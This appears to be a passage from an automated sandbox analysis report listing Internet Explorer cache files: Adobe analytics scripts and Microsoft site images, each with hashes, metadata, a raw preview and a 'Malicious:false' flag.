                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RCb6b820eb13fb47b2a5b09e6dd171df6a-source.min.js
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RCb6b820eb13fb47b2a5b09e6dd171df6a-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RCb6b820eb13fb47b2a5b09e6dd171df6a-source.min.js', "null!==window.wdgtagging&&null!==window.wdgtagging.jsll&&function(t,e,s,f){window.location.pathname;var y=window.location.href;s.wdgVideoTagging=!1,s.videoTaggingHtmlInit=function(){s.wdgAttachedEvent={},s.wdgVideoName={};var n=\"\",a=\"\",o=!1,t=f(\"video[alt*='Feature Description Media'],.media-selector__display__media video\");t.length&&t.each(function(t){var e=this;a=f(f(\".media-selector__content button\")[t]).text(),n=f(e).attr(\"src\").match(/.net(.+)\\.(mp4)/i)[1],s.videoTaggingHtml(f(e),null,n,a,o),e.setAttribute(\"wdg-video\",!0)})},s.videoTaggingHtml=function(a,e,t,n,o){var i=!1,c=\"\",d=\"\",r=!0,g=!1,u=-1,T=!1,v=!1,l=!1,p=Math.floor(Date.now()/1e3),w={contentTags:{},behavior:\"\",act
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\RCe37a65e1116b45deb0955342783465c4-source.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):922
                                                                                                                                                                                                              Entropy (8bit):5.372207683544877
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:DGNTWFct/BuGNTWHU9c1INEHEwedy0j9iZWCwuNn/:DYt/BupvGmWDj9WWCv
                                                                                                                                                                                                              MD5:84156424AE9716704453505BEB347404
                                                                                                                                                                                                              SHA1:C22D3C509BA968BE1461EFD55A966EF96AEEB20E
                                                                                                                                                                                                              SHA-256:D20DBB3DBEFA698C012350A1CAB2629EC8B25EBA4AE46C54EC082C11A7217B52
                                                                                                                                                                                                              SHA-512:D04D3AAC21014561D9CA799C319650317BE47F6A889367FE8EA1965C93B453C2964525A1BD351C625896533CCAB2CD8260F32C5D6E4661F9AA42797815B38770
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RCe37a65e1116b45deb0955342783465c4-source.min.js
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RCe37a65e1116b45deb0955342783465c4-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RCe37a65e1116b45deb0955342783465c4-source.min.js', "null!=window.wdgtagging&&null!=window.wdgtagging.dcm&&function(t,i,e){var a=function(){window.location.pathname.match(/\\/en-us\\/surface\\/?$/i)&&e(document).on(\"click\",\".m-hero a[href*=help-me-choose], .surface-link-nav a, .surface-highlightFeature a\",function(){try{if(e(this).attr(\"href\")&&!e(this).attr(\"href\").match(/\\/(store|p|b)\\//i)){var t={u65:e(this).attr(\"data-bi-id\")};i.trackEvent(i.genericSrc,i.genericType,i.catPurchaseNow,t,this)}}catch(a){}})};t.category_all_status||t.category.advertising.status?a():t.category.advertising.queue.push(a)}(window.wdgtagging,window.wdgtagging.dcm,window.jQuery);");
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\RCeed614fd038d4ba98b1b8e462b9b7f63-source.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):5089
                                                                                                                                                                                                              Entropy (8bit):5.390058344269572
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:dBBjrFV4vW6LlU2Mq/OXjAFwFXMBi+E0sq/OfI6v6R9I/E2kIbX2XGqgm9S++yLo:dBFFV4vW6LlUi/OXEFwF8Bin0V/OA6vh
                                                                                                                                                                                                              MD5:A15A42FAEF344FCA42BD4C37B1B73223
                                                                                                                                                                                                              SHA1:EE10471748D5EAAD1D0359A2767B04F835F442DE
                                                                                                                                                                                                              SHA-256:DA07F077F83AA12D37C123635ACEE55FB6B854A63D1DE153C436F9FB7AADEB46
                                                                                                                                                                                                              SHA-512:5708CEDF8169DEC447625E25F7E118F35AFA8DE643D06A76C32E31F4FE8CBD89F6343D95193617B3E4F51853CDA13C300BE95E68826AA758BBF78600B527C5C6
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RCeed614fd038d4ba98b1b8e462b9b7f63-source.min.js
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RCeed614fd038d4ba98b1b8e462b9b7f63-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RCeed614fd038d4ba98b1b8e462b9b7f63-source.min.js', "null!==window.wdgtagging&&null!==window.wdgtagging.jsll&&function(t,n,s,f){window.location.pathname;var y=window.location.href;s.wdgVideoTagging=!1,s.videoTaggingHtmlInit=function(){s.wdgAttachedEvent={},s.wdgVideoName={};var e=\"\",a=\"\",o=!1,t=f(document).find(\".lightboxcontent video\");t.length&&t.each(function(t){var n=this;a=f(f(\".media-selector__content button\")[t]).text(),e=f(n).attr(\"src\").match(/.net(.+)\\.(mp4)/i)[1],s.videoTaggingHtml(f(n),null,e,a,o),n.setAttribute(\"wdg-video\",!0)})},s.videoTaggingHtml=function(a,n,t,e,o){var i=!1,c=\"\",d=\"\",r=!0,g=!1,u=-1,T=!1,v=!1,l=!1,w=Math.floor(Date.now()/1e3),p={contentTags:{},behavior:\"\",actionType:\"\"};p.contentTags.vidnm=e,p.co
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\RE1CmIw[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 37x37, segment length 16, progressive, precision 8, 358x201, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):21299
                                                                                                                                                                                                              Entropy (8bit):7.97829084831675
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:Lqwszu0yNfD1ynIgowyFwea9QF4zZEGPFzvBg7cxACjG/FV7yiGomY7G5m:LqwszuxLyIgOCbiF4DfmPh9z
                                                                                                                                                                                                              MD5:D156BEB72C6A3BDAA913843FC9F4011D
                                                                                                                                                                                                              SHA1:325717748AE81CF747F61F6B1F376478ADF43F0B
                                                                                                                                                                                                              SHA-256:115423F9F5E5B439F81F12A84466DD245705251E2D03F52D01987411F85F33FF
                                                                                                                                                                                                              SHA-512:10017AF4146E74BF160F66DD2C99130B167D119CFD8D830FEBD0D5183B60F6926EA064BCCC68D95819A39C5F86C0498C15FB187C33E3A88565B93C4C1D4884C0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1CmIw?ver=e555&q=90&m=6&h=201&w=358&b=%23FFFFFFFF&l=f&o=t&aim=true
                                                                                                                                                                                                              Preview: ......JFIF.....%.%.................................................................! !,,;...........................................................! !,,;........f..".....................................................nk....}i.....8.4....|@.....;.+..EUh.0..J.Q>.M$.$..!.......Z...HF/..N..T......}..A..<'..E..x..km...$u.].C.Q...O...X.3o....p.:\.#.I..4_` .R0.H..N.......1....@a.c...I&V.#.#l.ct...z....A.$ I..V.f....=.SQ??..(.M..7...@..T.T..w.N...g....$...s0...v}.Z....[..j.n.H.ph...(BR_......;t.$.[..e.....v.....N......h..^:......E.....~c.....L].-...XW..lC..[?.ayyan..9v=..c.........} ..on.dF.>.q.w_....%.JBW%.HO.p..L.q.C.4K.:..O.lb.K....D.q...E.^..|.t.3'N..|...&.....q...D..t......O.\...~Q~Wu...$...]..UY].@)I.TZ.9d..E.......a.M.@\..s.q..y....i.Ls....,.uI.Mh..W>h s...:s..>C.|...K.._...V!......}..|.fh...n..<......|K"..."...,.|5..@.UcK...b.f...l.......U.H.O.S.(...t..v...A@6...?...@c.W.......?...-.V.. ......:....[...y\......a. s\.....SP...H3..J..0,
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\RE4CFyx[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 37x37, segment length 16, progressive, precision 8, 358x201, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):23718
                                                                                                                                                                                                              Entropy (8bit):7.963044870790642
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:rYipzZN9J2u2zvjEH0v8ch28zcLF4GExeLxPzhEyKhuXDpgZmFzXIA6eDWKvb3Jv:rYczZjwuqj00vn8LmGEMhEyKEXDpgZmN
                                                                                                                                                                                                              MD5:6CAF2E3D3B2DAC315292D0D4CCFC1EFC
                                                                                                                                                                                                              SHA1:5EEBE09C72A7A48AB2718BEB328D335408AE4472
                                                                                                                                                                                                              SHA-256:1DF611AF6D112C0F6AC3CBC0E7F4E5CFE94B2B06599DACD6B3C19B40DCE37CFB
                                                                                                                                                                                                              SHA-512:3B494CE405070A9E97512D499C020E224D442D447D66576FA94CAE4F2F4A405D2AFD4920FF23D009856CF4C51D56428AF8D9AF61A2FD74CEB2B81E4CBA67040C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4CFyx?ver=25c5&q=90&m=6&h=201&w=358&b=%23FFFFFFFF&l=f&o=t&x=839&y=615&aim=true
                                                                                                                                                                                                              Preview: ......JFIF.....%.%....................................................................%%2..............................................................%%2........f.."..................................................@............................................).....8=....@...qo..)$..a...^.........T...3y.....2..N.\.`..WG.........._..#..].rM..%........V..q..J7>~6j%k{.t.....{;<f..e...T.>..[.U....ke,n.......N...>.fl..dz.!....;..@....E..fz.:.q.sXH.G....wtP.(..LS.cA.Q.....u....A:....,.....$6..t..z.awu.g^._.,.{<.f.-u.I.......}.{.h...2.3b..S....{.W.V..k.=........`.V..{8....[..T.>.7..l.....0.......a.=..YM....S`..c:...'.k.|.t......\..'y..:.R>.-].f6.-...&.........ea...`.'..6}/?.@..#}5+l#.7.R&k\i.Sn....-......F.Y....{.Uv-?.?K..P....B...8..rh_9U.&...E'.F.W....w.w.t...b..}.\....F._[..\.m}.g...H..v...&a..:ds.D1zp*.p..%...q.....y..K....S...+:......'c.9.+..0Xm. ......=....q.........Ck..{......T.M.....y.rU..-.........0....@..#.5.......E.}.-ft.^.j.nr...S.,..$..g
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\RE4Gz9Z[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 37x37, segment length 16, progressive, precision 8, 279x157, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):3630
                                                                                                                                                                                                              Entropy (8bit):7.780260168142241
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:n7Oo3DSZbgcpE5tVGDMxsKWtsBIly7GfeyrQ:n7Oo3mk5LGGWTlSG2y0
                                                                                                                                                                                                              MD5:8B5ADB5A22FB201C0DFFC097B3169629
                                                                                                                                                                                                              SHA1:07443EEE16B840C2E4BC72DF8158CDDE8425E0A9
                                                                                                                                                                                                              SHA-256:9DA1401DCB9626DE02228AE5676AC83894AF45CCE5F9B907DE739971732BD933
                                                                                                                                                                                                              SHA-512:A33236AC670A6494AD57E18528CBB8D25BE88D07425A5C3F32D6FAF26B16C8D5C30077B366B8324E8A408BE923FE93A1AA4810C83FF6CE1940BD74824F75E8D9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Gz9Z?ver=247b&q=90&m=6&h=157&w=279&b=%23FFFFFFFF&l=f&o=t&aim=true
                                                                                                                                                                                                              Preview: ......JFIF.....%.%..................................................#....#)" ")1,,1>;>QQm............................................#....#)" ")1,,1>;>QQm..........."...............................................................=v.....>~..,X.!.^C.30..q.?..n2.6y..u..."..1dX.l..W....}.<.q..~.....v.i\.c.%.o.(..W.=....a.........}..........?Ol@...$U.......}.z...y.....3.U....kZ.u@.<;...r..V[.&\.S...u@.|'..*....eL...%uo....>,Z.'?....Z.0a..A.i.~.z..Y....6...N}..eu.-4._.3O..;-..t......OA....a.T...yp.......................................................:..;..p.............../.q...(.....V.N.?,.$@..............................................#T+.[..........yx;...H..../.........Z..V............K...........................!Q.13Aaq...24@Brs...."CRb......#0D. %S`c..............?...oX.n0..o.ZS.@..Tin^.&....`c<......e......EJQ..+...*R..H$........j...jd..t.mB.T+:1../...[0G.!y....8*E.X.?....w=...u.....F|?.m..E.{B.s..1...&}[.........-....7n.0...s>3..z*p..2.y....u...?.F..t7<b.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\RE4IAbd[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 48 x 48, 8-bit gray+alpha, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):299
                                                                                                                                                                                                              Entropy (8bit):6.9327258598069195
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:6v/lhPmLtkHTPmZCux6oNCRAXfJpDnTfjAldbiYDrS5leup:6v/7OgmI+pNhPJVzjGxaic
                                                                                                                                                                                                              MD5:23725D794C6381A2415127E19EA78EC6
                                                                                                                                                                                                              SHA1:B960C9DCFEDE35AFADCB85101AA764ACDC27D729
                                                                                                                                                                                                              SHA-256:1DB279992F8D10795CC13728993DAAC75FCF9ED6D53FD10175A9F0BE089CF4CE
                                                                                                                                                                                                              SHA-512:E86FA74F820666767D6FDA021ADE7355420751914598290D1D999DD6773D8166183D8C73FC37FE04F3E36DCDA0B440FEE73F769C565D88FBBAA42E00A3E0991F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4IAbd?ver=2a1f&q=90&m=6&h=48&w=48&b=%23FFFFFFFF&l=f&o=t&aim=true
                                                                                                                                                                                                              Preview: .PNG........IHDR...0...0.......1.....orNT..w.....IDATX.....P....$.!.......>.`..6..Q.O...)...ho...9E.=........r.h4...,..F.C..76.`y..t.7...XJV.D........|...pU@...P@..&.g......9{...0=.`..@.._-8........i_.....#.."9 ..!p.Ro.h......3o>....y.....~G:..aFK......,~.H..@5...."....#.....IEND.B`.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\RE4Ihun[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 35 x 35, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):1302
                                                                                                                                                                                                              Entropy (8bit):7.784684509997271
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:JY+r0pBPhJ+7wVYskGSetEsEADYmaaAI3gZILltFRjM4Rx991RkoHOc:JvK/+FshtusEADYalqILPg4RZ3d
                                                                                                                                                                                                              MD5:3F16F8F5CF38894D8840ED65E03E2DE8
                                                                                                                                                                                                              SHA1:5DF732DFF007C797C44FF52064734B4E82E35272
                                                                                                                                                                                                              SHA-256:5C4EB3F7A87834778B6DD55F4B1F9C9F5F98FE45E163BDE32915F62A239DC646
                                                                                                                                                                                                              SHA-512:14016B3CC6EFDC3AA242ADE2447FA5783B06AA3A7DDCC8112791B99E2C73FF252C32EFF4B663CD5F9816CC971A46B187FF12E91D93D022130A3C011B30B30797
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Ihun?ver=36b5&q=90&m=6&h=35&w=35&b=%23FFFFFFFF&l=f&o=t&aim=true
                                                                                                                                                                                                              Preview: .PNG........IHDR...#...#.......Y....orNT..w.....IDATX..].UU......9g..xf&....qD"3.H...0.....*.......(.....B..,(.J(.I. A..2+.2.&..................6{/..k.....[....<..u.w...je....O.....S0..C.......a)...V...b............5#.i.v..0....]..=...X.d.{......G.8.>`c. .....CdW....^.f/...W..:V6b.,.Y....t..a........]...5w^...zh..l6a...D.PH..-z.?..L.....3...(g..W.N..D.cB....j.....d".".V9'.>q..a|Fg...[.t{.V...;....Z....x^.j.L.%.i.8.2k.d.....{A..{..[..D...]$.T...).e.i.S..I...8A.... 8.+...c.:...S3.....6..-b....d(...Ba..V9G.:.....u.z...^.\...b[B.1...2.L...g;........9*b..vJ.yO..9.{.`.u..B.rx.=8......c.2`.c...'...X.]x........P..1..{+X..D.~....\..8..K...>.i....O..Ds.6.C.......*Z(..A..f.k.k..j....X.O.............wy13.NQ.H..Y7.......Q-*.;...VZ.(...(.....h...k..P..|..su..0[....&..7...Z.].(....<~..J!F.4d..V:..WS,.O5.*.1.Au.AA.XV......KZis..|) _...."`.dj.t.i..s)....:...bl....R...S.F..[.".T...Q.....hWGZ1...B..'........+...K.l.f...Vg....5...[.1...R...c`.D.P.|_...6.D..
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\RE4Ihva[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 35 x 35, 8-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):1351
                                                                                                                                                                                                              Entropy (8bit):6.2649745282957
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:JND+ZqieqKV20TUPGm70pULfBTZLYmNy8IS:JN0qJqKYaUPG1eTZs58t
                                                                                                                                                                                                              MD5:890B80C76CD2C80E3C8B24A20B868D90
                                                                                                                                                                                                              SHA1:EBC414CFD4C9B624C51FEEB6EA0920B76CC07937
                                                                                                                                                                                                              SHA-256:86060DDEBD7B3E91E96F20C432B815EE4F737755BD97989C032456A6CC03AA7C
                                                                                                                                                                                                              SHA-512:36BB52105E1D903EBE30596F8461657CB6CC76E3D0C0977E0B74A6347A38037F9EA5E65ABD04771ACC5101921FBEB9D7E807C8FB7CE3B08959A8882867D1FFDE
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Ihva?ver=4998&q=90&m=6&h=35&w=35&b=%23FFFFFFFF&l=f&o=t&aim=true
                                                                                                                                                                                                              Preview: .PNG........IHDR...#...#.....).Ck....PLTE...!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.!v.A.=.....tRNS..:\g_@.".../.x..o`k......n..d..P..(*2>Y......s..B3,.&...r...c.[.H.....i..~....U.....M.uq#....-..]......p.'...hT...Q9<;C.A..%..J.L.+..?.....................R.W.}.=..C.....orNT..w.....IDAT8...C.A....-*-..,.,.B.R0.D.,....*33...lK+.0<K;.....7.;...l......gvfgv.a..`.b.......*.Z.z..Q\........`7..!6m.GEe...Uo...}.Qg.}...:.E..;..6...]M......t5.IkKY...{<uB...7z.3k......U...Q..C....0G.!.....PL.CI.....(.2AE
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\RE4IkaI[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 35 x 35, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):885
                                                                                                                                                                                                              Entropy (8bit):7.686366910080781
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:JY+2UWFGSQDUkwQuzUTZ4RRZgxCFiE2OCL79UKbL:Jny8SQIk7UUTZ4R2CFiE25L5bL
                                                                                                                                                                                                              MD5:EFCAAF5FA55BFDE7A47C65DEDA48A047
                                                                                                                                                                                                              SHA1:8B41C6084B5896D8E6D82764DB04BB6469383BA0
                                                                                                                                                                                                              SHA-256:DF35776A1C2BE81F7B28431A057F63F06B61F34EBA847FA609B5808606034EE9
                                                                                                                                                                                                              SHA-512:5F89F92DAB596BBA2E0273676CE4869699DFBF3B46DA2397ECB2E20C45AD65DEC7DF4D3BE445E6426F2751DE73EED466199707DED6E6604B27618AA2774D3CBB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4IkaI?ver=ede8&q=90&m=6&h=35&w=35&b=%23FFFFFFFF&l=f&o=t&aim=true
                                                                                                                                                                                                              Preview: .PNG........IHDR...#...#.......Y....pHYs..........+.....'IDATx...NQ..g.24j..XL^&;......,$I..$?.,.&...&.SX...da5HMI#c..6&c.j...03>.k.....c\.....>.9...<....{.\.8..b\...nh..T..x..H..8..0.|.0.G.^b.`...7.~.o..*%.*Y.....~).<.$f$....I.e..F..#P.-;..@u..i.z....j.Z$.A.....+..U.5..l9q.o..j..N..2.a...f..B9U2).-....=.u.4.%.....O9..:..]p.U..-2....K`*...H{.9.hCs...$;.*.;./...C.....K?i.pH.1.`?.}.{1$.&.y8L.k.e.T.'.......1..a-l..L/.,...d..$..H..TO..v9...7.N.D..Q.t..&_..YD..d........bb"c.+b..L.&PM$A.;..}.\f....5)..\f..V.*..j.r}......i.WI_.*@.3.../...0.Tb..F.#.B{.V'j.,.m...M...*lm..=..P...-...".E.<....p.v....f-8uzV.N...k.....$..c.c...i.e3...]....3.:!. .je.+.K..q.O...5.[.lz...X.&g...2..f..9+.z.j.f......2..... ..^.+*&8....R.K{.:....F...../.C/0.$..a.q..vHbn..K....{.7f.L.d...}..zs.H?.~..$...._I.|.F.t.Obb...k..i.......)o`a..N..}g....g+./..E..I...sf.!......IEND.B`.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\RE4IvNv[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 48 x 48, 8-bit gray+alpha, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):230
                                                                                                                                                                                                              Entropy (8bit):6.703271722728244
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:6v/lhPmLtk+hkyOmVVBQodc9GAQgpkNDr9F2up:6v/7OlkybVVBJc9Glgp+L7
                                                                                                                                                                                                              MD5:FB04F3FF1D4E400D4CBEDE2B7596972D
                                                                                                                                                                                                              SHA1:17C65DCDE8A0DCE042AAF4F709E69BE9BFD7B002
                                                                                                                                                                                                              SHA-256:E1FB4D3D0947611EB8C40CA0B40076D6499A869FA4B2483B076A5D8E027C30FC
                                                                                                                                                                                                              SHA-512:D7B5CF0A78A2BEE55434E859C1E1F1FF4330509DD122F485C98CEA4A419C4F7E406F0720682D02E0E1664A3D5E104EB0828F65193E13F44371DDB98C51C531E1
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4IvNv?ver=f640&q=90&m=6&h=48&w=48&b=%23FFFFFFFF&l=f&o=t&aim=true
                                                                                                                                                                                                              Preview: .PNG........IHDR...0...0.......1.....orNT..w.....IDATX...!..@.....z,..J. ...:(HPm*9.....Z_...$[.*.&]73..6Y....!%.h..s....<.[.#..%.G+>..l@....'-..8y./...... @.......0&..+..u...../I.`..{.,.....SB.1d.9........p....IEND.B`.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\RE4qAnJ[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 75 x 75, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):6256
                                                                                                                                                                                                              Entropy (8bit):7.9630433435493035
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:zeTXunquuDgXH3GqnYpmd5NCkUy3S7/UtvLwai1:WXunhuDcHHYo5AQmp
                                                                                                                                                                                                              MD5:1097651F5185E40360B3A57FDA3E3503
                                                                                                                                                                                                              SHA1:0EDAECE4856953DA6DBDB55C0894D067134D6D88
                                                                                                                                                                                                              SHA-256:15CE9F918CF28D32287F45765434B6CE68FDE667E67DBFD8BFBD64FC419E2CFF
                                                                                                                                                                                                              SHA-512:A508644ADEE0683F9E051B305387F9A9A9D95B743DAB3B7742BDE44C8590E31203EDECE608959EBB7BB8C7EF7E2300D102F491059E097A8A335DD1B67F130CE1
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4qAnJ?ver=e135&q=100&h=75&w=75&b=%23FFFFFFFF&aim=true
                                                                                                                                                                                                              Preview: .PNG........IHDR...K...K.....8Nz.....pHYs..........+....."IDATx..\i.\.u..Mw.Y.".!y...[........*.........+.2.@.(8......Xl(6.0.............h.I#...4{.L/..s.y}.M."i...E..{.~.w.}K.!n>o.F.s.F..1...9X...n...U.+O.UVD......{..LU...q&.-............c._Q.<.D.3......h.PS0.G".1s...i.M..?zR..WW...)...t,......{.........^=..j.w.......;&..c.3...q`}.Q...9yc.F|M..Z.d..Q..FL".0U..Z..(HA-.....&U.X..e.|..w..........O...mjk,.O......t..d...x..B.p...F..i.$....I. e..-..\QQ1............7].tow.C....5%J{9.T.Zq.._..N.K2.=.IV..B.$.L2a.2".)......X,>?.J}.w.w.vw..........`...z....U.X..H...p+.|PXUZr"O.h..E..1.x|Z4..)^..F....u..u...13...+j..Xx..^S..6.L..T.....!!.@)<"+......"L2...x<........7.....}.S...F=.s..]..~bUjQ,......p...........V......$.'TO...E.\_y.}?.].43.`m.ra.P......*"".#.H..K5..0{.._,...J.......n.....8c.JdF...X.....D,z7..y..xh..q.........Ft.i_i........"9k.../_x.._<.:Z.c..;..p....]...........T.....A...B..Nq0...Y.g.p........_......N8jFM..}....>s..r..h......[.N..X
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\RE4qRrT[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 39 x 40, 8-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):1421
                                                                                                                                                                                                              Entropy (8bit):7.260792221653173
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:m32TjS9BKgNx+qIT+bHztMILCG0eC7g31maxWq47QBgSQN2ty:m32aPJnW+bHPFC04av4c+Su2U
                                                                                                                                                                                                              MD5:5DD39CE77CBA28DF85075622014B798E
                                                                                                                                                                                                              SHA1:CB240322BFD57BA8131DB39CAE7CC52E4D2B94CF
